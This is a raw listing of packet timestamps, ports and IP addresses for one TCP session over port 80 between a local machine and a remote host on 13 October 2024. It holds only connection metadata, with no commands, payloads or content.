Oct 13, 2024 17:46:18.007208109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007213116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007225990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007236004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007237911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007251024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007262945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007272959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007276058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007276058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007285118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007313013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007323980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007329941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007329941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007334948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007347107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007390022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007390022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007416010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007426977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007436991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007447958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007457972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007471085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007479906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007479906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007530928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007541895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007551908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007563114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007565022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007565022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007574081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007586002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007615089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007616043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007616043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007626057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007637024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007647991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007673979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007673979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007719040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007728100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007738113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007749081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007759094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007770061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007771015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007771015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007781029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007791996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007816076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007816076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.009217978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096066952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096084118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096210003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096210957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096234083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096318960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096343994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096357107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096368074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096388102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096400023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096414089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096431971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096445084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096455097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096496105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096496105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096496105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096496105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096545935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096558094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096569061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096580029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096590996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096594095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096602917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096615076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096657991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096657991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096657991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096658945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096673012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096684933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096697092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096708059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096718073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096718073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096719027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096776009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096776009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096808910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096821070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096832037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096843958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096862078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096873045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096884012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096894026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096904993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096915960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096930027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096934080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096934080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096935034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096935034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.096947908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096959114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096976042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.096991062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097001076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097012997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097023964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097023964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097024918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097023964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097023964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097038031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097049952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097125053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097125053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097125053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097259045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097270012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097280979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097291946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097302914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097313881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097332001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097342968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097354889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097358942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097358942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097358942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097367048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097378016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097388029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097393990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097393990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097405910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097419024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097429991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097436905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097445011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097457886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097476006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097486973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097489119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097489119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097497940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097511053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097554922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097554922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097554922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097603083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097614050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097624063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097645998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097656965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097675085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097687960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097695112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097695112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097695112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097707033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097718954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097729921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097729921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097743034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097753048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097764969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097774982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097795963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097803116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097803116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097803116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097805977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097817898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097821951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097829103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097846031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097861052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097866058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097866058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097873926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097884893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097896099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097902060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.097959995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097970963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097981930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.097992897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098004103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098014116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098026037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098037958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098037958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098037958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098037958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098061085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098129988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098141909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098154068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098164082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098201036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098211050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098222017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098234892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098283052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098283052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098283052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098283052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098318100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098330021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098340034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098351955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098362923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098373890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098426104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098437071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098447084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098458052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098469973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098480940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098490000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098490000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098490000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098490000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098495007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.098655939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098655939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.098655939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187061071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187082052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187139988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187139988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187161922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187182903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187196016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187206984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187220097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187231064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187231064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187232018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187244892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187256098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187267065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187278032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187297106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187306881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187319040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187330008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187330961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187330961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187330961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187330961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187342882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187354088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187365055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187371969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187371969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187376976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187392950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187400103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187412977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187431097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187432051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187443018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187458038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187458038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187463045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187474966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187475920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187486887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187498093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187498093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187517881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187527895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187537909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187544107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187544107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187551022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187562943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187573910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187585115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187596083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187598944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187607050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187622070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187627077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187645912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187659025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187669039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187669039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187669039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187674999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187685966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187689066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187699080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187710047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187721968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187732935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187745094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187745094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187745094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187745094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187766075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187768936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187777996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187779903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187793016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187799931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187823057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187861919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187865019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187875986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187886000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187896967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187915087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187926054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187936068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187947035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187958956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187968016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187968016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187968016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187968969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187968016 CEST	49730	80	192.168.2.4	185.215.113.37
